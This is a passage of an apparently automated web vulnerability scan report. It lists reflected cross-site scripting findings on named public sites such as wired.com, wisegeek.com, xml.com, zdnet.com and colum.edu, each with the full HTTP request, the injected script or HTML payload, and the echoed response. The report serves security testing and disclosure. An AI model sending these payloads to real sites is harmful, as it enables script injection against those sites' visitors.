This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue/17-08c4df0"><a>0915993bba4 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=220 Expires: Mon, 22 Nov 2010 01:06:32 GMT Date: Mon, 22 Nov 2010 01:02:52 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue c_17-08c4df0"><a>0915993bba4"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f377"><a>a70e93eb2b8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue2f377"><a>a70e93eb2b8/17-09 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=217 Expires: Mon, 22 Nov 2010 01:05:19 GMT Date: Mon, 22 Nov 2010 01:01:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue2f377"><a>a70e93eb2b8 c_17-09"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4579"><a>26cfdf967a3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue/17-09f4579"><a>26cfdf967a3 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=238 Expires: Mon, 22 Nov 2010 01:06:33 GMT Date: Mon, 22 Nov 2010 01:02:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue c_17-09f4579"><a>26cfdf967a3"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96633"><a>d97168b35a3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue96633"><a>d97168b35a3/17-10 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=221 Expires: Mon, 22 Nov 2010 01:05:30 GMT Date: Mon, 22 Nov 2010 01:01:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue96633"><a>d97168b35a3 c_17-10"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84a3a"><a>b28e513b893 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue/17-1084a3a"><a>b28e513b893 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:06:51 GMT Date: Mon, 22 Nov 2010 01:02:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue c_17-1084a3a"><a>b28e513b893"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4172"><a>ef04e99490a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issued4172"><a>ef04e99490a/geekipedia HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29362 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:05:46 GMT Date: Mon, 22 Nov 2010 01:01:46 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issued4172"><a>ef04e99490a c_geekipedia"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88d75"><a>742ed78951f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue/geekipedia88d75"><a>742ed78951f HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29362 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:06:56 GMT Date: Mon, 22 Nov 2010 01:02:56 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue c_geekipedia88d75"><a>742ed78951f"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a220"><a>e0ebb2c7f4b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue8a220"><a>e0ebb2c7f4b/test2007/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29359 Vary: Accept-Encoding Cache-Control: max-age=218 Expires: Mon, 22 Nov 2010 01:08:46 GMT Date: Mon, 22 Nov 2010 01:05:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue8a220"><a>e0ebb2c7f4b c_test2007"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0cd5"><a>ead6bfc60a1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue/test2007c0cd5"><a>ead6bfc60a1/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29359 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:09:52 GMT Date: Mon, 22 Nov 2010 01:05:52 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue c_test2007c0cd5"><a>ead6bfc60a1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c0b9'-alert(1)-'2c32b372f59 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /3c0b9'-alert(1)-'2c32b372f59 HTTP/1.1 Host: www.wisegeek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <link rel="stylesheet" type="text/css" href="http://fonts.googleapis.com/css?family=Nobile:i,bi"> <link rel="stylesh ...[SNIP]... <script> var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-176713-1']); _gaq.push(['_trackPageview', '/404.htm?page=/3c0b9'-alert(1)-'2c32b372f59']);
(function() { var ga = document.createElement('script'); ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; ga.setAttribute('a ...[SNIP]...
1.1390. http://www.wisegeek.com/who-is-ferdinand-marcos.htm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.wisegeek.com
Path:
/who-is-ferdinand-marcos.htm
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f77e"-alert(1)-"41fff1b4500 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /who-is-ferdinand-marcos.htm?6f77e"-alert(1)-"41fff1b4500=1 HTTP/1.1 Host: www.wisegeek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Who is Ferdinand Marcos?</title> <link rel="stylesheet" type="text/css" href="http://fonts.googleapis.com/css?fa ...[SNIP]... <script> var artId = 39260; var tpl = "repeating-link-units-in-discussions"; var plId = "1290375185.7.6972"; var artUrl = "/who-is-ferdinand-marcos.htm?6f77e"-alert(1)-"41fff1b4500=1"; </script> ...[SNIP]...
1.1391. http://www.wisegeek.com/who-is-ferdinand-marcos.htm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.wisegeek.com
Path:
/who-is-ferdinand-marcos.htm
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fa863'-alert(1)-'74b896c2ec8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /who-is-ferdinand-marcos.htm?fa863'-alert(1)-'74b896c2ec8=1 HTTP/1.1 Host: www.wisegeek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Who is Ferdinand Marcos?</title> <link rel="stylesheet" type="text/css" href="http://fonts.googleapis.com/css?fa ...[SNIP]... rrow_id","discussionPostBoxHolder":"PageArticle-discussionPostBoxHolder_id"},"_actions":{"getDiscussionPostBoxJSON":"action[PageArticle:getDiscussionPostBoxJSON]"},"url":"\/who-is-ferdinand-marcos.htm?fa863'-alert(1)-'74b896c2ec8=1","postSuccessfull":false,"postError":false,"scrollToPostBox":null,"__id":"78daddf3385d741984006df22c09f954","__name":"PageArticle","__childControls":[],"__parentControlId":null}); ');c.addControl(id ...[SNIP]...
1.1392. http://www.xml.com/pub/a/2003/07/23/extendingrss.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.xml.com
Path:
/pub/a/2003/07/23/extendingrss.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 982b9"><script>alert(1)</script>009fb2a3c4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pub/a/2003/07/23/extendingrss.html?982b9"><script>alert(1)</script>009fb2a3c4=1 HTTP/1.1 Host: www.xml.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:32:28 GMT Server: Apache P3P: policyref="http://www.oreillynet.com/w3c/p3p.xml",CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONo OUR DELa PUBi OTRa IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" Content-Type: text/html; charset=ISO-8859-1 Connection: close Content-Length: 48244
<?xml version "1.0" encoding "UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/transitional.dtd"> <html xmlns="http://www.w3.org/1999 ...[SNIP]... <a href="http://www.oreilly.com/catalog/syndicationfeeds/?CMP=ILC-KC2876097557&ATT=http://www.xml.com/pub/a/2003/07/23/extendingrss.html?982b9"><script>alert(1)</script>009fb2a3c4=1"> ...[SNIP]...
1.1393. http://www.xml.com/pub/a/2003/07/23/extendingrss.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.xml.com
Path:
/pub/a/2003/07/23/extendingrss.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 99584--><script>alert(1)</script>0a38ce97934 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /pub/a/2003/07/23/extendingrss.html?99584--><script>alert(1)</script>0a38ce97934=1 HTTP/1.1 Host: www.xml.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:32:31 GMT Server: Apache P3P: policyref="http://www.oreillynet.com/w3c/p3p.xml",CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONo OUR DELa PUBi OTRa IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" Content-Type: text/html; charset=ISO-8859-1 Connection: close Content-Length: 48475
<?xml version "1.0" encoding "UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/transitional.dtd"> <html xmlns="http://www.w3.org/1999 ...[SNIP]... <a href="/cs/user/login?x-redirect=http://www.xml.com/pub/a/2003/07/23/extendingrss.html?99584--><script>alert(1)</script>0a38ce97934=1"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d10a9'%3bdf7c136c81d was submitted in the REST URL parameter 4. This input was echoed as d10a9';df7c136c81d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283d10a9'%3bdf7c136c81d HTTP/1.1 Host: www.zdnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <me ...[SNIP]... <script type="text/javascript"> (function() { var toolbar = new CNB.Toolbar('toolbar-192487', { 'cid': '192487', 'serviceCid': 'desktop_4283d10a9';df7c136c81d', 'title': 'Micro Center beats Intel's deal, offers its 64GB SSD for just $99.99', 'summary': 'Intel has slashed prices on its mainstream solid state drives, but Micro Center has ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2730"><script>alert(1)</script>a93be0ef7e9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/microsoft/rssf2730"><script>alert(1)</script>a93be0ef7e9?tag=mantle_skin;content HTTP/1.1 Host: www.zdnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8efef"><a>e12d9ec9b08 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /search8efef"><a>e12d9ec9b08?t=1&mode=rss HTTP/1.1 Host: www.zdnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 21 Nov 2010 21:32:40 GMT Server: Apache Set-Cookie: geo-data=%7B%22region%22%3A%22tx%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%224%22%2C%22metrocode%22%3A%22618%22%2C%22longittude%22%3A%22-95.363%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22houston%22%2C%22cityconf%22%3A%223%22%2C%22citycode%22%3A%2218%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2244%22%2C%22latitude%22%3A%2229.763%22%7D; expires=Mon, 21-Nov-2011 21:32:40 GMT; path=/; domain=.zdnet.com Status: 404 Not Found Keep-Alive: timeout=15, max=994 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Content-Length: 41330
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <me ...[SNIP]... <link rel="canonical" href="http://www.zdnet.com/search8efef"><a>e12d9ec9b08?t=1&mode=rss" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6efa8<script>alert(1)</script>49c3ec12972 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /course_descriptions6efa8<script>alert(1)</script>49c3ec12972/52-3804.html HTTP/1.1 Host: www2.colum.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 21 Nov 2010 21:35:44 GMT Server: Apache/1.3.41 (Darwin) PHP/5.1.6 DAV/1.0.3 mod_ssl/2.8.31 OpenSSL/0.9.7l X-Powered-By: PHP/5.1.6 Connection: close Content-Type: text/html Content-Length: 15912
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head> <meta http-equiv="content-type" content="text/html; char ...[SNIP]... <p>The requested URI http://www2.colum.edu/course_descriptions6efa8<script>alert(1)</script>49c3ec12972/52-3804.html was not found. The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e5d02'-alert(1)-'0a403166bf8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /course_descriptionse5d02'-alert(1)-'0a403166bf8/52-3804.html HTTP/1.1 Host: www2.colum.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 21 Nov 2010 21:35:43 GMT Server: Apache/1.3.41 (Darwin) PHP/5.1.6 DAV/1.0.3 mod_ssl/2.8.31 OpenSSL/0.9.7l X-Powered-By: PHP/5.1.6 Connection: close Content-Type: text/html Content-Length: 15873
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload be8ad--><script>alert(1)</script>b8db784d8f3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /course_descriptions/be8ad--><script>alert(1)</script>b8db784d8f3 HTTP/1.1 Host: www2.colum.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:35:46 GMT Server: Apache/1.3.41 (Darwin) PHP/5.1.6 DAV/1.0.3 mod_ssl/2.8.31 OpenSSL/0.9.7l Cache-Control: max-age=60 Expires: Sun, 21 Nov 2010 21:36:46 GMT X-Powered-By: PHP/5.1.6 Connection: close Content-Type: text/html Content-Length: 15415
